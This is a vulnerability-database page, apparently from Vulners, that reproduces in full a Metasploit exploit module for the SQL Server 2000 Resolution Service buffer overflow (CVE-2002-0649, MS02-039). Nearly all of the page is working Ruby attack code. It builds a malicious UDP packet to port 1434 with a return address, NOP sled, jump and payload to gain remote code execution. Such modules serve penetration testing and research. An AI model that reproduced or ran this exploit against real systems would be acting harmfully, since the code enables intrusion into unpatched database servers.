Microsoft SQL Server Resolution Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Microsoft SQL Server Resolution Overflow, Buffer Overflow in SQL Server 200


                                                ##
# $Id: ms02_039_slammer.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::MSSQL

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;Microsoft SQL Server Resolution Overflow&#39;,
			&#39;Description&#39;    =&#62; %q{
					This is an exploit for the SQL Server 2000 resolution
				service buffer overflow. This overflow is triggered by
				sending a udp packet to port 1434 which starts with 0x04 and
				is followed by long string terminating with a colon and a
				number. This module should work against any vulnerable SQL
				Server 2000 or MSDE install (pre-SP3).

			},
			&#39;Author&#39;         =&#62; [ &#39;hdm&#39; ],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: 9179 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;2002-0649&#39;],
					[ &#39;OSVDB&#39;, &#39;4578&#39;],
					[ &#39;BID&#39;, &#39;5310&#39;],
					[ &#39;MSB&#39;, &#39;MS02-039&#39;],

				],
			&#39;Privileged&#39;     =&#62; true,
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;    =&#62; 512,
					&#39;BadChars&#39; =&#62; &#34;\x00\x3a\x0a\x0d\x2f\x5c&#34;,
					&#39;StackAdjustment&#39; =&#62; -3500,
				},
			&#39;Targets&#39;        =&#62;
				[
					[
						&#39;MSSQL 2000 / MSDE &#60;= SP2&#39;,
						{
							&#39;Platform&#39; =&#62; &#39;win&#39;,
							&#39;Ret&#39;      =&#62; 0x42b48774,
						},
					],
				],
			&#39;Platform&#39;       =&#62; &#39;win&#39;,
			&#39;DisclosureDate&#39; =&#62; &#39;Jul 24 2002&#39;,
			&#39;DefaultTarget&#39; =&#62; 0))

		register_options(
			[
				Opt::RPORT(1434)
			], self.class)
	end


	def check
		info = mssql_ping
		if (info[&#39;ServerName&#39;])
			print_status(&#34;SQL Server Information:&#34;)
			info.each_pair { |k,v|
				print_status(&#34;   #{k + (&#34; &#34; * (15-k.length))} = #{v}&#34;)
			}
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit

		connect_udp
		print_status(sprintf(&#34;Sending UDP packet with return address 0x%.8x&#34;, target.ret))
		print_status(&#34;Execute &#39;net start sqlserveragent&#39; once access is obtained&#34;);

		# \x68:888 =&#62; push dword 0x3838383a
		buf = &#34;\x04&#34; + rand_text_english(800, payload_badchars) + &#34;\x68:888&#34;

		# Return to the stack pointer
		buf[ 97, 4] = [target.ret].pack(&#39;V&#39;)

		# Which lands right here
		buf[101, 6] = make_nops(6)

		# Jumps 8 bytes ahead
		buf[107, 2] = &#34;\xeb\x08&#34;

		# Write to thread storage space to avoid a crash
		buf[109, 8] = [0x7ffde0cc, 0x7ffde0cc].pack(&#39;VV&#39;)

		# And finally into the payload
		buf[117,payload.encoded.length] = payload.encoded

		udp_sock.put(buf)

		disconnect_udp
		handler
	end

end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1